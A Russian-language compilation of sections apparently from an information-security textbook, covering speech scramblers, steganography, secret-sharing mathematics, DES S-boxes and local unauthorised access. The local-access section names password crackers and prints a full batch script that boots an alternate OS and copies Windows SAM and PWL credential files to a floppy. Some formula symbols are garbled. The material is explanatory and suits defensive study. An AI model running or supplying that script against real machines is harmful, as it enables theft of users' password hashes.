Критерии оценки систем закрытия речи
Существует четыре основных критерия, по которым оцениваются характеристики устройств закрытия речевых сигналов, а именно: разборчивость речи, узнаваемость говорящего, степень закрытия и основные технические характеристики системы.
Приемлемым коммерческим качеством восстановленной на приемном конце речи считается такое, когда слушатель может без труда определить голос говорящего и смысл произносимого сообщения. Помимо этого, под хорошим качеством передаваемого речевого сигнала подразумевается и возможность воспроизведения эмоциональных оттенков и других специфических эффектов разговора.
Влияющие на качество восстановленного узкополосного речевого сигнала параметры узкополосных закрытых систем передачи речи определяются способами кодирования, методами модуляции, воздействием шума, инструментальным ошибками и условиями распространения. Шумы и искажения воздействуют на характеристики каждой компоненты системы по-разному, и снижение качества, ощущаемое пользователем, происходит от суммарного эффекта понижения характеристик отдельных компонент. Существующие объективные методы оценки качества речи и систем не применимы для сравнения характеристик узкополосных дискретных систем связи, в которых речевой сигнал сначала преобразуется в систему параметров на передающей стороне, потом передается по каналу связи, а затем синтезируется в речевой сигнал в приемнике.
Существующие субъективные методы измерения разборчивости и естественности отличаются значительной трудоемкостью, поскольку в этом деле многое зависит от используемого словаря, выбранного канала связи, диалекта, возраста и эмоционального состояния испытуемых дикторов. Поэтому проведение измерений для получения статистически надежных и повторяемых оценок параметров системы при изменяющихся условиях требует больших затрат.
При использовании радиоканалов эти трудности еще более возрастают из-за неопределенности условий распространения, и достичь повторяемости результатов невозможно без применения моделей радиоканалов.
Для дуплексных систем дополнительное влияние на качество оказывает временная задержка сигнала, вносимая речевым скремблером или шифратором. Поскольку основным показателем секретности передаваемых речевых сообщений является его неразборчивость при перехвате злоумышленником, сравнение по степеням защиты является определяющим моментом при выборе пользователем конкретной системы закрытия речи. В основном распределение по уровням закрытия речевых сообщений соответствует ранее приведенной диаграмме.
Как правило, аналоговые скремблеры используются там, где применение цифровых систем закрытия речи затруднено из-за наличия возможных ошибок передачи (наземные линии связи с плохими характеристиками или каналы дальней радиосвязи), обеспечивают тактический уровень защиты и хорошо предохраняют переговоры от посторонних “случайных ушей”, имеющих ограниченные ресурсы, будь то соседи или сослуживцы. Для таких применений годятся системы со статическим закрытием, т.е. осуществляющие шифрование по фиксированному ключу.
Если же необходимо сохранить конфиденциальность информации от возможных конкурентов, обладающих достаточным техническим и специальным оснащением, то нужно применять аналоговые скремблеры среднего уровня закрытия с динамически меняющимся в процессе разговора ключом. Естественно, что эти системы будут дороже, чем системы закрытия с фиксированным ключом, однако они настолько осложняют работу злоумышленников по разработке дешифрующего алгоритма, что время, потраченное на это, значительно обесценит добытую информацию из перехваченного сообщения.
Поскольку в отечественных устройствах закрытия, как правило, перед началом сообщения передается синхропоследовательность, в которой содержится часть дополнительной информации о ключе текущего передаваемого сообщения, у злоумышленника имеется только один шанс попытаться его раскрыть, перебрав широкое множество ключевых установок. Если ключи меняются ежедневно, то даже при известном алгоритме преобразования речи злоумышленнику придется перебрать много тысяч вариантов в поисках истинной ключевой последовательности.
В случае, если есть предположение, что в целях добывания крайне интересующей его информации злоумышленник может воспользоваться услугами высококвалифицированных специалистов и их техническим арсеналом, то для того, чтобы быть уверенным в отсутствии утечки информации, необходимо применять системы закрытия речи, обеспечивающие стратегическую (самую высокую) степень защиты. Это могут обеспечить лишь устройства дискретизации речи с последующим шифрованием и новый тип аналоговых скремблеров. Последние используют методы преобразования аналогового речевого сигнала в цифровую форму, затем применяют методы криптографического закрытия, аналогичные тем, что используются для закрытия данных, после чего результирующее закрытое сообщение преобразуется обратно в аналоговый сигнал и подается в линию связи. Для раскрытия полученного сигнала на приемном конце производятся обратные преобразования. Эти новые гибридные устройства легко адаптируются к существующим коммуникационным сетям и предлагают значительно более высокий уровень защиты речевых сообщений, чем традиционные аналоговые скремблеры, с сохранением всех преимуществ последних в разборчивости и узнаваемости восстановленной речи.
Следует отметить, что в системах засекречивания речи, основанной на шифре перестановки N речевых элементов, общее количество ключей-перестановок равно N!. Однако это значение не отражает реальной криптографической стойкости системы из-за избыточности информации, содержащейся в речевом сигнале, а также из-за разборчивости несовершенным образом переставленной и инвертированной речи. Поэтому криптоаналитику часто необходимо опробовать лишь K << N! случайных перестановок для вскрытия речевого кода. Этот момент следует учитывать при выборе надежной системы аналогового скремблирования.
Глава 20
Стеганография
Надежная защита информации от несанкционированного доступа является актуальной, но не решенной в полном объеме проблемой. Одно из перспективных направлений защиты информации сформировали современные методы стеганографии.
Слово стеганография в переводе с греческого буквально означает тайнопись (steganos — тайна, секрет; graphy — запись).
Стеганография представляет собой совокупность методов, основывающихся на различных принципах, которые обеспечивают сокрытие самого факта существования секретной информации в той или иной среде, а также средств реализации этих методов. К ней можно отнести огромное множество секретных средств связи, таких как невидимые чернила, микрофотоснимки, условное расположение знаков, тайные (скрытые) каналы, средства связи с плавающими частотами, голография и т.д.
В настоящее время развиваются методы компьютерной стеганографии — самостоятельного научного направления информационной безопасности, изучающей проблемы создания компонентов скрываемой информации в открытой информационной среде, которая может быть сформирована вычислительными системами и сетями. Особенностью стеганографического подхода является то, что он не предусматривает прямого оглашения факта существования защищаемой информации. Это обстоятельство позволяет в рамках традиционно существующих информационных потоков или информационной среды решать некоторые важные задачи защиты информации ряда прикладных областей.
Основным определяющим моментом в стеганографии является стеганографическое преобразование. До недавнего времени стеганография, как наука, в основном изучала отдельные методы сокрытия информации и способы их технической реализации. Разнообразие принципов, заложенных в стеганографических методах, по существу тормозило развитие стеганографии как отдельной научной дисциплины и не позволило ей сформироваться в виде некоторой науки со своими теоретическими положениями и единой концептуальной системой, которая обеспечила бы формальное получение качественных и количественных оценок стеганометодов. В этом история развития стеганографии резко отличается от развития криптографии.
До конца XIX века стеганография и криптография развивались в рамках единой науки о тайнописи. После формулирования голландским офицером Кирхгоффсом (A.
Kerckhoffs) знаменитого правила о том, что стойкость криптографического алгоритма должна определяется исключительно стойкостью ключа, криптография как отдельная наука отделилась от стеганографии. За последние десятилетия криптология из совокупности специальных методов превратилась в наукоемкую дисциплину, основанную на фундаментальных исследованиях из теории вероятности, математической статистики, чисел, алгебраических полей, что позволило ей решить ряд важных для практического применения задач. Например, определение стойкости зашифрованных сообщений по отношению к возможным средствам криптоанализа, а также целый ряд других задач, решение которых позволяет получать достаточно четкие количественные характеристики средств криптографической защиты информации.
В основе многих подходов к решению задач стеганографии лежит общая с криптографией методическая база, заложенная Шенноном (C. E. Shannon) в теории тайнописи. Однако до сих пор теоретические основы стеганографии остаются практически неразработанными.
Наблюдаемый в настоящее время интерес к стеганографии, как совокупности методов сокрытия информации, возник в большой мере благодаря интенсивному внедрению и широкому распространению средств вычислительной техники во все сферы деятельности человека. В рамках вычислительных сетей возникли достаточно широкие возможности по оперативному обмену различной информацией в виде текстов, программ, звука, изображений между любыми участниками сетевых сеансов независимо от их территориального размещения. Это позволяет активно применять все преимущества, которые дают стеганографические методы защиты.
Стеганографические методы находят все большее применение в оборонной и коммерческой сферах деятельности в силу их легкой адаптируемости при решении задач защиты информации, а также отсутствия явно выраженных признаков средств защиты, использование которых может быть ограничено или запрещено (как, например, криптографических средств защиты).
Лазерные стетоскопы
Лазерные стетоскопы — это устройства, позволяющие считывать лазерным лучом вибрацию с предметов, промодулированых акустическим сигналом. Обычно акустическая информация снимается с оконных стекол. Современные лазерные стетоскопы хорошо работают на дальности до 300 м. Недостатками этой аппаратуры являются высокая стоимость (до 30 тыс. долларов), необходимость пространственного разноса источника и приемника лазерного излучения, сильная зависимость качества работы от внешних условий (метеоусловия, солнечные блики и т.д.).
Линейное разделение секрета
Начнем с предложенной Шамиром элегантной схемы разделения секрета для пороговых структур доступа. Пусть К = GF(q) — конечное поле из q элементов (например, q = p — простое число и К = Zp) и q > n. Сопоставим участникам n различных ненулевых элементов поля {a1, …, an} и положим a0 = 0. При распределении секрета s0
дилер СРС генерирует k–1 независимых равномерно распределенных на GF(q) случайных величин fj (j = 1, …, k–1) и посылает і-му учаснику (і = 1, ..., n) “его” значение si = f(ai) многочлена f(x) = f0
+ f1x + … + fk-1xk-1, где f0 = s0. Поскольку любой многочлен степени k-1 однозначно восстанавливается по его значениям в произвольных k точках (например, по интерполяционной формуле Лагранжа), то любые k участников вместе могут восстановить многочлен f(x) и, следовательно, найти значение секрета как s0 = f(0). По этой же причине для любых k–1 участников, любых полученных ими значений проекций si и любого значения секрета s0 существует ровно один “соответствующий” им многочлен, т.е. такой, что si = f(ai) и s0 = f(0). Следовательно, эта схема является совершенной в соответствии с определением 2. “Линейность” данной схемы становится ясна, если записать “разделение секрета” в векторно-матричном виде:
s = fH, (18.3)
где s = (s0, …, sn), f = (f0, …, fk–1), k× (n+1) — матрица H = (hij) = (aij-1) и h00 = 1. Заметим, что любые k столбцов этой матрицы линейно независимы, а максимально возможное число столбцов матрицы H равно q, чтобы добиться обещанного значения q+1 надо добавить столбец, соответствующий точке “бесконечность”.
Возьмем в (18.3) в качестве H произвольную r × (n + 1)-матрицу с элементами из поля K. Получаемую СРС, будем называть одномерной линейной СРС. Она является совершенной комбинаторной СРС со структурой доступа Г, состоящей из множеств А таких, что вектор h0
представим в виде линейной комбинации векторов {hj: j Î A}, где hj — это j-ый столбец матрицы H.
Строками матрицы V, соответствующей данной СРС, являются, как видно из (18.3), линейные комбинации строк матрицы H. Перепишем (18.3) в следующем виде
sj = (f, hj) для j = 0, 1, …, n,
где (f, hj) — скалярное произведение векторов f и hj. Если А Î Г, т.е. если h0 = ??jhj, то
s0 = (f, h0) = = ??j(f, hj) = ??jsj
и, следовательно, значение секрета однозначно находится по его “проекциям”. Рассмотрим теперь случай, когда вектор h0 не представим в виде линейной комбинации векторов {hj: j Î A}. Нам нужно показать, что в этом случае для любых заданных значений координат из множества А число строк матрицы V с данным значением любой координаты не зависит от этого значения. В этом не трудно убедится, рассмотрев (18.3) как систему линейных уравнений относительно неизвестных fi
и воспользовавшись тем, что система совместна тогда и только тогда, когда ранг матрицы коэффициентов равен рангу расширенной матрицы, а число решений у совместных систем одинаково и равно числу решений однородной системы.
Указание. Рассмотрите две системы: c “нулевым” уравнением и без него (т.е. со свободным членом). Так как вектор h0
не представим в виде линейной комбинации векторов {hj: j Î A}, то ранг матрицы коэффициентов второй системы на 1 больше ранга матрицы коэффициентов первой системы. Отсюда немедленно следует, что если первая система совместна, то совместна и вторая при любом s0.
Эта конструкция подводит нас к определению общей линейной СРС. Пусть секрет и его “проекции” представляются как конечномерные векторы si = (s, …, s) и генерируются по формуле si = fHi, где Hi
— некоторые r × mi-матрицы. Сопоставим каждой матрице Hi
линейное пространство Li
ее столбцов (т.е. состоящее из всех линейных комбинаций вектор-столбцов матрицы Hi). Несложные рассуждения, аналогичные приведенным выше для одномерного случая (все mi = 1), показывают, что данная конструкция дает совершенную СРС тогда и только тогда, когда семейство линейных подпространств {L0, …, Ln} конечномерного векторного пространства K удовлетворяет упомянутому выше свойству “все или ничего”.
При этом множество А является разрешенным {La: a Î A} содержит подпространство L0 целиком. С другой стороны, множество А является неразрешенным (А Ï Г), если и только если линейная оболочка подпространств {La: a Î A} пересекается с подпространством L0
только по вектору 0. Отметим, что если бы для некоторого А пересечение L0 и линейной оболочки {La: a Î A} было нетривиальным, то участники А не могли бы восстановить секрет однозначно, но получали бы некоторую информацию о нем, т.е. схема не была бы совершенной.
Пример 18.3. Рассмотрим следующую структуру доступа для случая четырех участников, задаваемую Гmin = {{1,2}, {2,3}, {3,4}}. Она известна как первый построенный пример структуры доступа, для которой не существует идеальной реализации. Более того, было доказано, что для любой ее совершенной реализации R(Г) ? 3/2. С другой стороны, непосредственная проверка показывает, что выбор матриц H0, H1, ..., H4, приведенных на рис. 18.2, дает совершенную линейную СРС с R = 3/2, реализующую эту структуру, которая, следовательно, является и оптимальной (наиболее экономной) СРС.
Рис. 18.2. Матрицы, реализующие совершенную линейную СРС
Локальный доступ
Как уже отмечалось, при наличии у злоумышленника локального доступа к АС и благоприятной для него обстановки он сможет обойти практически любую защиту. Для того чтобы значительно снизить шансы злоумышленника, имеющего локальный доступ к интересующей его АС, необходимо предпринять целый комплекс мер, как технического, так и организационного характера, начиная от проектирования архитектуры АС с учетом всех требований защиты и заканчивая установкой камер наблюдения, охранной сигнализации и организации специального режима доступа. Однако на практике в большинстве случаев, по крайней мере какой-либо один фактор остается вне поля зрения организаций, обрабатывающих в своих АС информацию с ограниченным доступом, которая может интересовать тех или иных злоумышленников. Нередко оказывается и так, что таких факторов значительно больше, поэтому если организация не приняла всех мер для того, чтобы предотвратить несанкционированный локальный доступ к своим АС и их компонентам, можно сказать с уверенностью, что ее секреты рано или поздно попадут к заинтересованным лицам.
Рассмотрим подробнее методы и средства несанкционированного доступа к информации, которые можно применить на локальном уровне.
Прежде всего, злоумышленник может воспользоваться одним из самых древних способов, против которого не сможет противостоять никакая АС, — хищением. Хищение информации, ее носителей, отдельных компонентов АС и, учитывая современные тенденции к миниатюризации СВТ, целых АС было и остается одним из самых распространенных способов несанкционированного получения информации. При этом квалификация лиц, участвующих в хищении может быть самой низкой, а правоохранительные органы, расследующие такие факты, да и зачастую сами подвергшиеся хищению организации, как правило, сосредотачивают основное внимание на осязаемых материальных ценностях. К хищению можно отнести и такие действия злоумышленников, когда компоненты АС просто подменяются на аналогичные. Например, сначала специалист высокой квалификации оказавшись под каким-то предлогом в офисе организации и используя благоприятную ситуацию, может за считанные секунды выяснить модель жесткого диска, причем все его действия будет контролировать легальный пользователь (типичная ситуация — любезное предложение помощи неопытному сотруднику, у которого “завис” компьютер и т.п.).
Затем злоумышленникам остается лишь найти вышедший из строя жесткий диск аналогичной модели и, тайно проникнув в офис, заменить интересующий их жесткий диск неисправным. Если в организации не ведется строгого учета компонентов АС по серийным номерам (что, к сожалению, встречается сплошь и рядом), а злоумышленникам удастся скрыть факт проникновения в помещение (что также не очень большая проблема для опытных взломщиков), то такое происшествие не вызовет никакого подозрения.
Кроме того, к хищениям во многих случаях можно отнести прямое копирование всего жесткого диска на другой диск. Даже если исходный диск защищен, например, с помощью шифрования, злоумышленник средней квалификации может принести с собой другой жесткий диск большего объема и просто скопировать все содержимое исходного диска на свой диск, который впоследствии будет передан на исследование специалистам более высокой квалификации. В таком случае получение несанкционированного доступа к скопированной информации — всего лишь вопрос времени.
Наконец, следует знать, что часто хищение информации маскируется под хищение материальных ценностей. Например, злоумышленники могут похитить все офисное оборудование, хотя на самом деле их интересует лишь содержимое жесткого диска компьютера, стоявшего в кабинете руководителя. Часто оказывается, что руководители организаций, требуя от подчиненных соблюдения всех правил информационной безопасности, не распространяют на себя эти требования, хотя имеют доступ к любым файлам своих подчиненных. Например, большинство руководителей даже не подозревают, что все открываемые ими по сети файлы таких программ, как Microsoft Word и других офисных приложений, копируются в папку для временных файлов Windows на локальном диске.
Вторым распространенным методом несанкционированного получения информации при локальном доступе к АС является использование открытого сеанса легального пользователя. Здесь возможности злоумышленника определяются лишь временем, на который он получает доступ к АС, полномочиями в АС легального пользователя и наличием (точнее, отсутствием) контроля со стороны легального пользователя или его коллег.
Особая опасность этого метода заключается в том, что со стороны специалистов по защите информации действия злоумышленника, воспользовавшегося открытым сеансом легального пользователя, скорее всего, не вызовут никаких подозрений (в большинстве случаев на “своих” пользователей, особенно если они занимают в иерархии организации более высокое положение, администраторы безопасности обращают меньше всего внимания). Часто пользователи практически подталкивают посторонних к несанкционированному доступу к своим системам, размещая свои пароли “под рукой” прямо на рабочем месте (например, наклеивая листки для записей с паролями на монитор или на тыльную сторону клавиатуры). В этом случае такая “защищенная” система ничем не отличается от системы, на которой остался открытым сеанс легального пользователя.
Близким к указанному выше методу является подбор пароля легального пользователя. Этот метод более “заметен” со стороны компонентов АС, обеспечивающих безопасность, однако также оказывается достаточно эффективным. Например, в организации может быть реализована жесткая политика по выбору паролей, обеспечивающая невозможность случайного подбора или угадывания паролей за 2–3 попытки с блокированием учетной записи при превышении количества попыток. При этом все пользователи организации, покидая рабочее место, должны временно блокировать доступ к своим системам так, чтобы блокировка снималась только при правильно введенном пароле. Однако некоторые пользователи могут установить полюбившиеся программы-заставки, в которых ввод пароля происходит в обход основной операционной системы. Часто оказывается, что такие пользователя в качестве пароля выбирают последовательности вида 1111 или user и т.п., что значительно облегчает задачу подбора пароля легального пользователя.
Часто для осуществления подбора пароля легального пользователя злоумышленники прибегают к использованию открытого сеанса этого же или другого пользователя с последующим копированием системных файлов. В частности, в системах Windows 98/ME злоумышленник может скопировать файлы с расширением PWL, находящиеся в основной папке Windows, а затем применить к ним какое-нибудь средство вскрытия файлов PWL, например Repwl или CAIN.
В системах Windows NT/2000/XP с той же целью злоумышленник может скопировать файл SAM или его резервную копию SAM._, находящиеся в папке repair системной папки Windows, а затем попытаться установить хранящиеся в них пароли с помощью системы L0phtCrack. В Unix-подобных системах наибольший интерес для злоумышленника представляют файлы /etc/passwd или shadow. С помощью таких утилит, как crack или john, любой злоумышленник, обладая минимальной квалификацией, может за считанные минуты или даже секунды получить информацию о паролях легальных пользователей, хранящихся в этих файлах.
Еще одним методом локального несанкционированного доступа является использование учетной записи легального пользователя для расширения полномочий в АС. Он отличается от метода использования открытого сеанса легального пользователя тем, что в данном случае злоумышленнику не требуется выдавать себя за другого, поскольку он в силу тех или иных причин сам имеет доступ к АС. Например, во многих организациях сторонним пользователям, посетителям, представителям других организаций, временным сотрудникам и другим лицам, не являющимся сотрудниками организации, предоставляют так называемые гостевые учетные записи. Однако часто оказывается, что АС, предназначенные для гостевого доступа, имеют физический доступ ко всем АС организации, а действия сторонних пользователей, получающих гостевой доступ, практически никак не контролируются. Это позволяет злоумышленнику, воспользовавшись специальными программами взлома (exploit), расширить свои полномочия вплоть до получения полного доступа ко всем АС организации. В системах Windows NT/2000/XP, например, злоумышленник может воспользоваться такими программами взлома, как getadmin или main, а в Unix-подобных системах — многочисленными программами взлома командной оболочки и других Unix-программ, в изобилии присутствующих в Internet, действие которых основано на известных изъянах соответствующего системного программного обеспечения Unix.
Наконец, часто злоумышленнику, имеющему локальный доступ к АС, не нужно вообще обладать квалификацией даже среднего уровня, чтобы получить несанкционированный доступ к информации этой АС.
Во многих случаях ему достаточно прибегнуть к такому простому приему, как загрузка альтернативной операционной системы. Такая система может загружаться как с дискеты, так и с компакт-диска. (К особой разновидности этого метода является срабатывание функции автозапуска в Windows 98. Воспользовавшись этим изъяном, злоумышленник может запустить нужную ему программу даже на системе c Windows 98, защищенной с помощью экранной заставки с паролем). Например, с помощью простого командного файла, приведенного в листинге 13.1, злоумышленник может в считанные минуты перезагрузить компьютер, работающий под управлением Windows 98/ME/2000/XP и получить в свое распоряжение перечень всех файлов, а также файлы PWL и SAM, хранящиеся на дисках этого компьютера.
Листинг 13.1. Пример командного файла для
загрузки альтернативной операционной системы
@ECHO OFF
mode con codepage prepare=((866) ega3.cpi)
mode con codepage select=866
keyb ru,,keybrd3.sys
set EXPAND=YES
SET DIRCMD=/O:N
set LglDrv=27 * 26 Z 25 Y 24 X 23 W 22 V 21 U 20 T
set LglDrv=%LglDrv% 19 S 18 R 17 Q 16 P 15 O 14 N
set LglDrv=%LglDrv% 13 M 12 L 11 K 10 J 9 I 8 H 7 G
set LglDrv=%LglDrv% 6 F 5 E 4 D 3 C
call setramd.bat %LglDrv%
set temp=c:\
set tmp=c:\
path=%RAMD%:\;a:\;a:\vc
copy command.com %RAMD%:\ >nul
set comspec=%RAMD%:\command.com >nul
md %RAMD%:\vc >nul
%RAMD%:
copy a:\vc\*.* %RAMD%:\vc >nul
copy a:\arj.exe %RAMD%:\ >nul
copy a:\files.arj %RAMD%:\ >nul
copy a:\files.a01 %RAMD%:\ >nul
arj.exe e files.arj >nul
arj.exe e files.a01 -y >nul
A:\smartdrv.exe >nul
del files.a* >nul
md %RAMD%:\sec >nul
cd sec >nul
md disks >nul
cd disks >nul
ldir c: /s > c.txt
ldir d: /s > d.txt
Окончание листинга 13.1
cd \
ntfspro.exe >nul
cd sec\disks
dir c: /s >> c.txt
dir d: /s >> d.txt
cd..
md c
md d
copy /b c:\winnt\system32\config\sam %RAMD%:\sec\c >nul
copy /b d:\winnt\system32\config\sam %RAMD%:\sec\d >nul
copy /b c:\windows\system32\config\sam %RAMD%:\sec\c >nul
copy /b d:\windows\system32\config\sam %RAMD%:\sec\d >nul
copy /b c:\windows\*.pwl %RAMD%:\sec\c >nul
copy /b d:\windows\*.pwl %RAMD%:\sec\d >nul
cd \
arj.exe a -r -v1200 dirs.arj %RAMD%:\sec -y >nul
copy %RAMD%:\dirs.arj a:\
copy %RAMD%:\dirs.a01 a:\
МАД (MAD)
МАД — это контрразведка Бундесвера и подчинена непосредственно министру обороны. В состав МАД входит 5 управлений (административное, внутренней безопасности, противодействия антиконституционным силам, противодействия иностранным разведкам, техническое), группа S (контрразведка в аппарате Бундесвера, НАТО и т.п.) и 6 групп, находящихся в командовании военными округами (Киль, Ганновер, Дюссельдорф, Майнц, Штутгарт, Мюнхен), а также более 40 мобильных подразделений. Главные задачи МАД — разоблачение фактов военного шпионажа, предотвращение диверсий, борьба с агентурой, внедряемой в Бундесвер.
Когда вопрос касается безопасности государства, МАД действует совместно с остальными федеральными службами и с разведывательными службами стран НАТО. Хотя, как может показаться, декларируемые функции МАД должны ограничиваться лишь военной контрразведкой, однако ее полномочия достаточно широки и, как правило, не афишируются.
Математика разделения секрета
Рассмотрим следующую, в наше время вполне реальную ситуацию. Два совладельца драгоценности хотят положить ее на хранение в сейф. Сейф современный, с цифровым замком на 16 цифр. Так как совладельцы не доверяют друг другу, то они хотят закрыть сейф таким образом, чтобы они могли открыть его вместе, но никак не порознь. Для этого они приглашают третье лицо, называемое дилером, которому они оба доверяют (например, потому что оно не получит больше доступ к сейфу). Дилер случайно выбирает 16 цифр в качестве “ключа”, чтобы закрыть сейф, и затем сообщает первому совладельцу втайне от второго первые 8 цифр “ключа”, а второму совладельцу втайне от первого — последние 8 цифр “ключа”. Такой способ представляется с точки здравого смысла оптимальным, ведь каждый из совладельцев, получив “полключа”, не сможет им воспользоваться без второй половины, а что может быть лучше?! Недостатком данного примера является то, что любой из совладельцев, оставшись наедине с сейфом, может за пару минут найти недостающие “полключа” с помощью несложного устройства, предназначенного для перебора ключей и работающего на тактовой частоте 1 МГц. Кажется, что единственный выход — в увеличении размера “ключа”, скажем, вдвое. Но есть другой математический выход, опровергающий (в данном случае — к счастью) соображения здравого смысла. А именно, дилер независимо выбирает две случайные последовательности по 16 цифр в каждой, сообщает каждому из совладельцев втайне от другого “его” последовательность, а в качестве “ключа”, чтобы закрыть сейф, использует последовательность, полученную сложением по модулю 10 соответствующих цифр двух выбранных последовательностей. Довольно очевидно, что для каждого из совладельцев все 1016 возможных “ключей” одинаково вероятны и остается только перебирать их, что потребует в среднем около полутора лет для устройства перебора ключей, оборудованного процессором с частотой 100 МГц.
И с математической, и с практической точки зрения неинтересно останавливаться на случае двух участников и следует рассмотреть общую ситуацию.
Неформально говоря, схема, разделяющая секрет (СРС) позволяет “распределить” секрет между n участниками таким образом, чтобы заранее заданные разрешенные множества участников могли однозначно восстановить секрет (совокупность этих множеств называется структурой доступа), а неразрешенные — не получали никакой дополнительной к имеющейся априорной информации о возможном значении секрета. СРС с последним свойством называются совершенными.
История СРС начинается с 1979 года, когда эта проблема была поставлена и во многом решена Блейкли и Шамиром для случая пороговых (n, k)-СРС (т.е. разрешенными множествами являются любые множества из k или более элементов). Особый интерес вызвали так называемые идеальные СРС, т.е.такие, где объем информации, предоставляемой участнику, не больше объема секрета. Оказалось, что любой такой СРС соответствует матроид и, следовательно, не для любой структуры доступа возможно идеальное разделение секрета. С другой стороны, было показано, что для любого набора разрешенных множеств можно построить совершенную СРС, однако известные построения весьма неэкономны. Рассмотрим некоторые алгебро-геометрические и комбинаторные задачи, возникающие при математическом анализе СРС.
Будем говорить, что семейство подпространств {L0, …, Ln} конечномерного векторного пространства L над полем K удовлетворяет свойству “все или ничего”, если для любого множества A Ì {1, …, n} линейная оболочка подпространств {La: a Î A} либо содержит подпространство L0 целиком, либо пересекается с ним только по вектору 0. В подразделе “Линейное разделение секрета” мы увидим, что такое семейство задает “линейную” СРС, у которой множество A Ì {1, …, n} является разрешенным, если и только если линейная оболочка подпространств {La: a Î A} содержит подпространство L0 целиком. В связи с этим понятием возникает ряд вопросов. Например, если поле K конечно (|K| = q) и все подпространства {L0, …, Ln} одномерны, то каково максимально возможное число участников n для линейных пороговых (n, k)-СРС (k > 1)? Иначе говоря, каково максимально возможное число векторов {h0, …, hn} таких, что любые k векторов, содержащие вектор h0, линейно независимы, а любые k + 1 векторов, содержащие вектор h0, линейно зависимы.Оказывается, что это свойство эквивалентно следующему, на первый взгляд более сильному, свойству: любые k векторов линейно независимы, а любые k + 1 — линейно зависимы. Такие системы векторов изучались в геометрии как N-множества (N = n + 1) в конечной проективной геометрии PG(k–1, q), в комбинаторике — как ортогональные таблицы силы k и индекса ? = 1, в теории кодирования — как проверочные матрицы МДР кодов. В подразделе “Линейное разделение секрета” мы приведем известную конструкцию таких множеств с N = q + 1. Существует довольно старая гипотеза о том, что это и есть максимально возможное N, за исключением двух случаев: случая q < k, когда N = k + 1, и случая q = 2m, k = 3 или k = q – 1, когда N = q + 2.
Механизм действия S-блоков
Преобразование, с помощью которого 48-разрядный блок преобразуется в 32-разрядный, сводится к выборке восьми тетрад из 8 таблиц (S-блоков) размером 4 ´ 16 (табл. 18.7). Из каждого S-блока выбирается одна тетрада. Для этого 48-разрядный блок делится последовательно на 8 комбинаций по 6 бит каждая. Первая комбинация (слева) является входом в первый S-блок, вторая — во второй и т.д. При этом первый и последний биты комбинации задают номер строки, а остальные 4 бита — номер столбца S-блока, на пересечении которых расположена соответствующая тетрада. Конкретные значения Si (i = 1, …, 8) представлены в табл. 18.7.
Таблица 18.7. Таблицы S -блоков для DES
S1 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
0 | 14 | 4 | 13 | 1 | 2 | 15 | 11 | 8 | 3 | 10 | 6 | 12 | 5 | 9 | 0 | 7 | |||||||||||||||||
1 | 0 | 15 | 7 | 4 | 14 | 2 | 13 | 1 | 10 | 6 | 12 | 11 | 9 | 5 | 3 | 8 | |||||||||||||||||
2 | 4 | 1 | 14 | 8 | 13 | 6 | 2 | 11 | 15 | 12 | 9 | 7 | 3 | 10 | 5 | 0 | |||||||||||||||||
3 | 15 | 12 | 8 | 2 | 4 | 9 | 1 | 7 | 5 | 11 | 3 | 14 | 10 | 0 | 6 | 13 | |||||||||||||||||
S2 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
0 | 15 | 1 | 8 | 14 | 6 | 11 | 3 | 4 | 9 | 7 | 2 | 13 | 12 | 0 | 5 | 10 | |||||||||||||||||
1 | 3 | 13 | 4 | 7 | 15 | 2 | 8 | 14 | 12 | 0 | 1 | 10 | 6 | 9 | 11 | 5 | |||||||||||||||||
2 | 0 | 14 | 7 | 11 | 10 | 4 | 13 | 1 | 5 | 8 | 12 | 6 | 9 | 3 | 2 | 15 | |||||||||||||||||
3 | 13 | 8 | 10 | 1 | 3 | 15 | 4 | 2 | 11 | 6 | 7 | 12 | 0 | 5 | 14 | 9 | |||||||||||||||||
S3 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
0 | 10 | 0 | 9 | 14 | 6 | 3 | 15 | 5 | 1 | 13 | 12 | 7 | 11 | 4 | 2 | 8 | |||||||||||||||||
1 | 13 | 7 | 0 | 9 | 3 | 4 | 6 | 10 | 2 | 8 | 5 | 14 | 12 | 11 | 15 | 1 | |||||||||||||||||
2 | 13 | 6 | 4 | 9 | 8 | 15 | 3 | 0 | 11 | 1 | 2 | 12 | 5 | 10 | 14 | 7 | |||||||||||||||||
3 | 1 | 10 | 13 | 0 | 6 | 9 | 8 | 7 | 4 | 15 | 14 | 3 | 11 | 5 | 2 | 12 | |||||||||||||||||
S4 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
0 | 7 | 13 | 14 | 3 | 0 | 6 | 9 | 10 | 1 | 2 | 8 | 5 | 11 | 12 | 4 | 15 | |||||||||||||||||
1 | 13 | 8 | 11 | 5 | 6 | 15 | 0 | 3 | 4 | 7 | 2 | 12 | 1 | 10 | 14 | 9 | |||||||||||||||||
2 | 10 | 6 | 9 | 0 | 12 | 11 | 7 | 13 | 15 | 1 | 3 | 14 | 5 | 2 | 8 | 4 | |||||||||||||||||
3 | 3 | 15 | 0 | 6 | 10 | 1 | 13 | 8 | 9 | 4 | 5 | 11 | 12 | 7 | 2 | 14 | |||||||||||||||||
S5 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
0 | 2 | 12 | 4 | 1 | 7 | 10 | 11 | 6 | 8 | 5 | 3 | 15 | 13 | 0 | 14 | 9 | |||||||||||||||||
1 | 14 | 11 | 2 | 12 | 4 | 7 | 13 | 1 | 5 | 0 | 15 | 10 | 3 | 9 | 8 | 6 | |||||||||||||||||
2 | 4 | 2 | 1 | 11 | 10 | 13 | 7 | 8 | 15 | 9 | 12 | 5 | 6 | 3 | 0 | 14 | |||||||||||||||||
3 | 11 | 8 | 12 | 7 | 1 | 14 | 2 | 13 | 6 | 15 | 0 | 9 | 10 | 4 | 5 | 3 | |||||||||||||||||
S6 | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | |||||||||||||||||
